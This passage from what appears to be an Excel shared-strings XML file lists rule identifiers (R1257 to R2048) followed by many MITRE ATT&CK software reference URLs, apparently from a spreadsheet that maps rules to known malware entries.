    <t>R1257</t>
  </si>
  <si>
    <t>R1258</t>
  </si>
  <si>
    <t>R1259</t>
  </si>
  <si>
    <t>R1260</t>
  </si>
  <si>
    <t>R1261</t>
  </si>
  <si>
    <t>R1262</t>
  </si>
  <si>
    <t>R1263</t>
  </si>
  <si>
    <t>R1264</t>
  </si>
  <si>
    <t>R1265</t>
  </si>
  <si>
    <t>R1267</t>
  </si>
  <si>
    <t>R1271</t>
  </si>
  <si>
    <t>R1273</t>
  </si>
  <si>
    <t>R1274</t>
  </si>
  <si>
    <t>R1275</t>
  </si>
  <si>
    <t>R1276</t>
  </si>
  <si>
    <t>R1278</t>
  </si>
  <si>
    <t>R1281</t>
  </si>
  <si>
    <t>R1282</t>
  </si>
  <si>
    <t>R1283</t>
  </si>
  <si>
    <t>R1284</t>
  </si>
  <si>
    <t>R1285</t>
  </si>
  <si>
    <t>R1286</t>
  </si>
  <si>
    <t>R1287</t>
  </si>
  <si>
    <t>R1288</t>
  </si>
  <si>
    <t>R1289</t>
  </si>
  <si>
    <t>R1290</t>
  </si>
  <si>
    <t>R1291</t>
  </si>
  <si>
    <t>R1292</t>
  </si>
  <si>
    <t>R1294</t>
  </si>
  <si>
    <t>R1295</t>
  </si>
  <si>
    <t>R1298</t>
  </si>
  <si>
    <t>R1299</t>
  </si>
  <si>
    <t>R1300</t>
  </si>
  <si>
    <t>R1301</t>
  </si>
  <si>
    <t>R1302</t>
  </si>
  <si>
    <t>R1303</t>
  </si>
  <si>
    <t>R1304</t>
  </si>
  <si>
    <t>R1305</t>
  </si>
  <si>
    <t>R1306</t>
  </si>
  <si>
    <t>R1307</t>
  </si>
  <si>
    <t>R1308</t>
  </si>
  <si>
    <t>R1309</t>
  </si>
  <si>
    <t>R1310</t>
  </si>
  <si>
    <t>R1314</t>
  </si>
  <si>
    <t>R1317</t>
  </si>
  <si>
    <t>R1318</t>
  </si>
  <si>
    <t>R1319</t>
  </si>
  <si>
    <t>R1320</t>
  </si>
  <si>
    <t>R1321</t>
  </si>
  <si>
    <t>R1323</t>
  </si>
  <si>
    <t>R1326</t>
  </si>
  <si>
    <t>R1327</t>
  </si>
  <si>
    <t>R1328</t>
  </si>
  <si>
    <t>R1330</t>
  </si>
  <si>
    <t>R1331</t>
  </si>
  <si>
    <t>R1332</t>
  </si>
  <si>
    <t>R1333</t>
  </si>
  <si>
    <t>R1334</t>
  </si>
  <si>
    <t>R1338</t>
  </si>
  <si>
    <t>R1339</t>
  </si>
  <si>
    <t>R1340</t>
  </si>
  <si>
    <t>R1341</t>
  </si>
  <si>
    <t>R1342</t>
  </si>
  <si>
    <t>R1343</t>
  </si>
  <si>
    <t>R1344</t>
  </si>
  <si>
    <t>R1345</t>
  </si>
  <si>
    <t>R1347</t>
  </si>
  <si>
    <t>R1348</t>
  </si>
  <si>
    <t>R1349</t>
  </si>
  <si>
    <t>R1350</t>
  </si>
  <si>
    <t>R1351</t>
  </si>
  <si>
    <t>R1352</t>
  </si>
  <si>
    <t>R1353</t>
  </si>
  <si>
    <t>R1354</t>
  </si>
  <si>
    <t>R1356</t>
  </si>
  <si>
    <t>R1357</t>
  </si>
  <si>
    <t>R1358</t>
  </si>
  <si>
    <t>R1359</t>
  </si>
  <si>
    <t>R1360</t>
  </si>
  <si>
    <t>R1361</t>
  </si>
  <si>
    <t>R1362</t>
  </si>
  <si>
    <t>R1363</t>
  </si>
  <si>
    <t>R1364</t>
  </si>
  <si>
    <t>R1366</t>
  </si>
  <si>
    <t>R1367</t>
  </si>
  <si>
    <t>R1368</t>
  </si>
  <si>
    <t>R1372</t>
  </si>
  <si>
    <t>R1373</t>
  </si>
  <si>
    <t>R1374</t>
  </si>
  <si>
    <t>R1375</t>
  </si>
  <si>
    <t>R1376</t>
  </si>
  <si>
    <t>R1377</t>
  </si>
  <si>
    <t>R1378</t>
  </si>
  <si>
    <t>R1379</t>
  </si>
  <si>
    <t>R1380</t>
  </si>
  <si>
    <t>R1381</t>
  </si>
  <si>
    <t>R1382</t>
  </si>
  <si>
    <t>R1383</t>
  </si>
  <si>
    <t>R1384</t>
  </si>
  <si>
    <t>R1385</t>
  </si>
  <si>
    <t>R1390</t>
  </si>
  <si>
    <t>R1391</t>
  </si>
  <si>
    <t>R1392</t>
  </si>
  <si>
    <t>R1394</t>
  </si>
  <si>
    <t>R1395</t>
  </si>
  <si>
    <t>R1396</t>
  </si>
  <si>
    <t>R1397</t>
  </si>
  <si>
    <t>R1398</t>
  </si>
  <si>
    <t>R1399</t>
  </si>
  <si>
    <t>R1400</t>
  </si>
  <si>
    <t>R1401</t>
  </si>
  <si>
    <t>R1402</t>
  </si>
  <si>
    <t>R1403</t>
  </si>
  <si>
    <t>R1404</t>
  </si>
  <si>
    <t>R1405</t>
  </si>
  <si>
    <t>R1406</t>
  </si>
  <si>
    <t>R1407</t>
  </si>
  <si>
    <t>R1408</t>
  </si>
  <si>
    <t>R1409</t>
  </si>
  <si>
    <t>R1410</t>
  </si>
  <si>
    <t>R1411</t>
  </si>
  <si>
    <t>R1412</t>
  </si>
  <si>
    <t>R1413</t>
  </si>
  <si>
    <t>R1414</t>
  </si>
  <si>
    <t>R1415</t>
  </si>
  <si>
    <t>R1416</t>
  </si>
  <si>
    <t>R1417</t>
  </si>
  <si>
    <t>R1418</t>
  </si>
  <si>
    <t>R1419</t>
  </si>
  <si>
    <t>R1420</t>
  </si>
  <si>
    <t>R1421</t>
  </si>
  <si>
    <t>R1423</t>
  </si>
  <si>
    <t>R1424</t>
  </si>
  <si>
    <t>R1425</t>
  </si>
  <si>
    <t>R1431</t>
  </si>
  <si>
    <t>R1433</t>
  </si>
  <si>
    <t>R1434</t>
  </si>
  <si>
    <t>R1435</t>
  </si>
  <si>
    <t>R1436</t>
  </si>
  <si>
    <t>R1437</t>
  </si>
  <si>
    <t>R1438</t>
  </si>
  <si>
    <t>R1439</t>
  </si>
  <si>
    <t>R1440</t>
  </si>
  <si>
    <t>R1441</t>
  </si>
  <si>
    <t>R1442</t>
  </si>
  <si>
    <t>R1443</t>
  </si>
  <si>
    <t>R1444</t>
  </si>
  <si>
    <t>R1445</t>
  </si>
  <si>
    <t>R1446</t>
  </si>
  <si>
    <t>R1447</t>
  </si>
  <si>
    <t>R1448</t>
  </si>
  <si>
    <t>R1449</t>
  </si>
  <si>
    <t>R1450</t>
  </si>
  <si>
    <t>R1451</t>
  </si>
  <si>
    <t>R1452</t>
  </si>
  <si>
    <t>R1453</t>
  </si>
  <si>
    <t>R1454</t>
  </si>
  <si>
    <t>R1455</t>
  </si>
  <si>
    <t>R1456</t>
  </si>
  <si>
    <t>R1457</t>
  </si>
  <si>
    <t>R1458</t>
  </si>
  <si>
    <t>R1459</t>
  </si>
  <si>
    <t>R1460</t>
  </si>
  <si>
    <t>R1461</t>
  </si>
  <si>
    <t>R1462</t>
  </si>
  <si>
    <t>R1463</t>
  </si>
  <si>
    <t>R1466</t>
  </si>
  <si>
    <t>R1467</t>
  </si>
  <si>
    <t>R1468</t>
  </si>
  <si>
    <t>R1470</t>
  </si>
  <si>
    <t>R1471</t>
  </si>
  <si>
    <t>R1472</t>
  </si>
  <si>
    <t>R1473</t>
  </si>
  <si>
    <t>R1474</t>
  </si>
  <si>
    <t>R1475</t>
  </si>
  <si>
    <t>R1476</t>
  </si>
  <si>
    <t>R1477</t>
  </si>
  <si>
    <t>R1480</t>
  </si>
  <si>
    <t>R1481</t>
  </si>
  <si>
    <t>R1482</t>
  </si>
  <si>
    <t>R1483</t>
  </si>
  <si>
    <t>R1484</t>
  </si>
  <si>
    <t>R1485</t>
  </si>
  <si>
    <t>R1486</t>
  </si>
  <si>
    <t>R1487</t>
  </si>
  <si>
    <t>R1488</t>
  </si>
  <si>
    <t>R1489</t>
  </si>
  <si>
    <t>R1490</t>
  </si>
  <si>
    <t>R1492</t>
  </si>
  <si>
    <t>R1493</t>
  </si>
  <si>
    <t>R1495</t>
  </si>
  <si>
    <t>R1496</t>
  </si>
  <si>
    <t>R1499</t>
  </si>
  <si>
    <t>R1500</t>
  </si>
  <si>
    <t>R1501</t>
  </si>
  <si>
    <t>R1503</t>
  </si>
  <si>
    <t>R1507</t>
  </si>
  <si>
    <t>R1508</t>
  </si>
  <si>
    <t>R1509</t>
  </si>
  <si>
    <t>R1510</t>
  </si>
  <si>
    <t>R1512</t>
  </si>
  <si>
    <t>R1513</t>
  </si>
  <si>
    <t>R1514</t>
  </si>
  <si>
    <t>R1515</t>
  </si>
  <si>
    <t>R1516</t>
  </si>
  <si>
    <t>R1517</t>
  </si>
  <si>
    <t>R1518</t>
  </si>
  <si>
    <t>R1520</t>
  </si>
  <si>
    <t>R1522</t>
  </si>
  <si>
    <t>R1523</t>
  </si>
  <si>
    <t>R1524</t>
  </si>
  <si>
    <t>R1525</t>
  </si>
  <si>
    <t>R1526</t>
  </si>
  <si>
    <t>R1527</t>
  </si>
  <si>
    <t>R1531</t>
  </si>
  <si>
    <t>R1532</t>
  </si>
  <si>
    <t>R1533</t>
  </si>
  <si>
    <t>R1534</t>
  </si>
  <si>
    <t>R1535</t>
  </si>
  <si>
    <t>R1536</t>
  </si>
  <si>
    <t>R1538</t>
  </si>
  <si>
    <t>R1539</t>
  </si>
  <si>
    <t>R1540</t>
  </si>
  <si>
    <t>R1542</t>
  </si>
  <si>
    <t>R1543</t>
  </si>
  <si>
    <t>R1544</t>
  </si>
  <si>
    <t>R1545</t>
  </si>
  <si>
    <t>R1546</t>
  </si>
  <si>
    <t>R1547</t>
  </si>
  <si>
    <t>R1548</t>
  </si>
  <si>
    <t>R1550</t>
  </si>
  <si>
    <t>R1551</t>
  </si>
  <si>
    <t>R1552</t>
  </si>
  <si>
    <t>R1553</t>
  </si>
  <si>
    <t>R1555</t>
  </si>
  <si>
    <t>R1556</t>
  </si>
  <si>
    <t>R1557</t>
  </si>
  <si>
    <t>R1558</t>
  </si>
  <si>
    <t>R1559</t>
  </si>
  <si>
    <t>R1560</t>
  </si>
  <si>
    <t>R1561</t>
  </si>
  <si>
    <t>R1562</t>
  </si>
  <si>
    <t>R1564</t>
  </si>
  <si>
    <t>R1565</t>
  </si>
  <si>
    <t>R1566</t>
  </si>
  <si>
    <t>R1567</t>
  </si>
  <si>
    <t>R1568</t>
  </si>
  <si>
    <t>R1569</t>
  </si>
  <si>
    <t>R1570</t>
  </si>
  <si>
    <t>R1571</t>
  </si>
  <si>
    <t>R1573</t>
  </si>
  <si>
    <t>R1574</t>
  </si>
  <si>
    <t>R1575</t>
  </si>
  <si>
    <t>R1576</t>
  </si>
  <si>
    <t>R1577</t>
  </si>
  <si>
    <t>R1578</t>
  </si>
  <si>
    <t>R1579</t>
  </si>
  <si>
    <t>R1580</t>
  </si>
  <si>
    <t>R1581</t>
  </si>
  <si>
    <t>R1582</t>
  </si>
  <si>
    <t>R1583</t>
  </si>
  <si>
    <t>R1584</t>
  </si>
  <si>
    <t>R1585</t>
  </si>
  <si>
    <t>R1586</t>
  </si>
  <si>
    <t>R1587</t>
  </si>
  <si>
    <t>R1588</t>
  </si>
  <si>
    <t>R1589</t>
  </si>
  <si>
    <t>R1590</t>
  </si>
  <si>
    <t>R1591</t>
  </si>
  <si>
    <t>R1592</t>
  </si>
  <si>
    <t>R1595</t>
  </si>
  <si>
    <t>R1596</t>
  </si>
  <si>
    <t>R1597</t>
  </si>
  <si>
    <t>R1598</t>
  </si>
  <si>
    <t>R1599</t>
  </si>
  <si>
    <t>R1600</t>
  </si>
  <si>
    <t>R1601</t>
  </si>
  <si>
    <t>R1602</t>
  </si>
  <si>
    <t>R1603</t>
  </si>
  <si>
    <t>R1604</t>
  </si>
  <si>
    <t>R1605</t>
  </si>
  <si>
    <t>R1606</t>
  </si>
  <si>
    <t>R1607</t>
  </si>
  <si>
    <t>R1608</t>
  </si>
  <si>
    <t>R1609</t>
  </si>
  <si>
    <t>R1610</t>
  </si>
  <si>
    <t>R1611</t>
  </si>
  <si>
    <t>R1612</t>
  </si>
  <si>
    <t>R1613</t>
  </si>
  <si>
    <t>R1614</t>
  </si>
  <si>
    <t>R1615</t>
  </si>
  <si>
    <t>R1616</t>
  </si>
  <si>
    <t>R1619</t>
  </si>
  <si>
    <t>R1621</t>
  </si>
  <si>
    <t>R1622</t>
  </si>
  <si>
    <t>R1624</t>
  </si>
  <si>
    <t>R1627</t>
  </si>
  <si>
    <t>R1628</t>
  </si>
  <si>
    <t>R1629</t>
  </si>
  <si>
    <t>R1630</t>
  </si>
  <si>
    <t>R1631</t>
  </si>
  <si>
    <t>R1632</t>
  </si>
  <si>
    <t>R1634</t>
  </si>
  <si>
    <t>R1635</t>
  </si>
  <si>
    <t>R1636</t>
  </si>
  <si>
    <t>R1637</t>
  </si>
  <si>
    <t>R1638</t>
  </si>
  <si>
    <t>R1639</t>
  </si>
  <si>
    <t>R1640</t>
  </si>
  <si>
    <t>R1641</t>
  </si>
  <si>
    <t>R1643</t>
  </si>
  <si>
    <t>R1644</t>
  </si>
  <si>
    <t>R1645</t>
  </si>
  <si>
    <t>R1646</t>
  </si>
  <si>
    <t>R1647</t>
  </si>
  <si>
    <t>R1648</t>
  </si>
  <si>
    <t>R1649</t>
  </si>
  <si>
    <t>R1650</t>
  </si>
  <si>
    <t>R1651</t>
  </si>
  <si>
    <t>R1653</t>
  </si>
  <si>
    <t>R1654</t>
  </si>
  <si>
    <t>R1655</t>
  </si>
  <si>
    <t>R1656</t>
  </si>
  <si>
    <t>R1658</t>
  </si>
  <si>
    <t>R1659</t>
  </si>
  <si>
    <t>R1660</t>
  </si>
  <si>
    <t>R1661</t>
  </si>
  <si>
    <t>R1662</t>
  </si>
  <si>
    <t>R1663</t>
  </si>
  <si>
    <t>R1666</t>
  </si>
  <si>
    <t>R1667</t>
  </si>
  <si>
    <t>R1668</t>
  </si>
  <si>
    <t>R1669</t>
  </si>
  <si>
    <t>R1670</t>
  </si>
  <si>
    <t>R1671</t>
  </si>
  <si>
    <t>R1673</t>
  </si>
  <si>
    <t>R1674</t>
  </si>
  <si>
    <t>R1675</t>
  </si>
  <si>
    <t>R1678</t>
  </si>
  <si>
    <t>R1679</t>
  </si>
  <si>
    <t>R1680</t>
  </si>
  <si>
    <t>R1682</t>
  </si>
  <si>
    <t>R1683</t>
  </si>
  <si>
    <t>R1684</t>
  </si>
  <si>
    <t>R1685</t>
  </si>
  <si>
    <t>R1686</t>
  </si>
  <si>
    <t>R1687</t>
  </si>
  <si>
    <t>R1688</t>
  </si>
  <si>
    <t>R1689</t>
  </si>
  <si>
    <t>R1690</t>
  </si>
  <si>
    <t>R1691</t>
  </si>
  <si>
    <t>R1692</t>
  </si>
  <si>
    <t>R1693</t>
  </si>
  <si>
    <t>R1694</t>
  </si>
  <si>
    <t>R1696</t>
  </si>
  <si>
    <t>R1699</t>
  </si>
  <si>
    <t>R1703</t>
  </si>
  <si>
    <t>R1705</t>
  </si>
  <si>
    <t>R1706</t>
  </si>
  <si>
    <t>R1707</t>
  </si>
  <si>
    <t>R1708</t>
  </si>
  <si>
    <t>R1709</t>
  </si>
  <si>
    <t>R1710</t>
  </si>
  <si>
    <t>R1711</t>
  </si>
  <si>
    <t>R1712</t>
  </si>
  <si>
    <t>R2013</t>
  </si>
  <si>
    <t>R2014</t>
  </si>
  <si>
    <t>R2015</t>
  </si>
  <si>
    <t>R2016</t>
  </si>
  <si>
    <t>R2017</t>
  </si>
  <si>
    <t>R2018</t>
  </si>
  <si>
    <t>R2019</t>
  </si>
  <si>
    <t>R2020</t>
  </si>
  <si>
    <t>R2021</t>
  </si>
  <si>
    <t>R2022</t>
  </si>
  <si>
    <t>R2023</t>
  </si>
  <si>
    <t>R2024</t>
  </si>
  <si>
    <t>R2025</t>
  </si>
  <si>
    <t>R2026</t>
  </si>
  <si>
    <t>R2027</t>
  </si>
  <si>
    <t>R2028</t>
  </si>
  <si>
    <t>R2029</t>
  </si>
  <si>
    <t>R2030</t>
  </si>
  <si>
    <t>R2031</t>
  </si>
  <si>
    <t>R2032</t>
  </si>
  <si>
    <t>R2033</t>
  </si>
  <si>
    <t>R2034</t>
  </si>
  <si>
    <t>R2035</t>
  </si>
  <si>
    <t>R2036</t>
  </si>
  <si>
    <t>R2037</t>
  </si>
  <si>
    <t>R2038</t>
  </si>
  <si>
    <t>R2039</t>
  </si>
  <si>
    <t>R2040</t>
  </si>
  <si>
    <t>R2041</t>
  </si>
  <si>
    <t>R2042</t>
  </si>
  <si>
    <t>R2043</t>
  </si>
  <si>
    <t>R2044</t>
  </si>
  <si>
    <t>R2045</t>
  </si>
  <si>
    <t>R2046</t>
  </si>
  <si>
    <t>R2047</t>
  </si>
  <si>
    <t>R2048</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0344</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0638</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0414</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0475</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0093</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0031</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0606</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0245</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0642</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0128</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0337</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0234</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0239</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0534</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0470</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0127</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0574</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0017</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0268</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0570</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0190</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0069</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0089</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0564</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0520</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0657</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0521</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0486</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0360</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0651</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0293</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0252</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0432</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0204</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0014</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0043</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0471</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0482</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0655</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0119</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0635</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0415</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0114</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0454</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0025</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0274</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0077</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0351</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0030</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0484</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0335</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0529</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0348</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0465</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0462</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0261</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0572</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0222</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0480</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0160</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0631</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0220</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0323</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0144</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0555</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0107</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0020</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0023</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0602</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0611</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0054</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0106</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0154</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0338</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0369</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0244</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0126</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0426</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0608</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0591</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0575</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0492</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0212</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0137</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0425</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0050</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0614</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0046</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0488</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0115</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0235</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0538</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0498</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0527</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0625</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0497</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0334</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0187</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0255</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0243</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0616</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0479</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0301</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0354</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0021</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0505</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0200</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0213</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0281</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0600</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0550</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0472</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0134</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0186</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0300</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0384</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0320</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0547</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0502</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0105</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0567</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0315</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0038</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0062</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0420</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0024</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0377</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0593</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0624</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0554</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0605</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0081</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0064</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0082</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0367</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0363</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0634</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0091</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0404</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0507</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0478</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0396</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0152</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0568</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0401</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0343</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0522</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0405</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0361</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0569</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0076</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0509</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0181</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0512</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0171</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0267</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0120</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0355</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0182</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0618</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0143</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0036</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0381</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0383</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0408</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0173</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0193</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0503</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0577</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0277</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0095</t>
  </si>
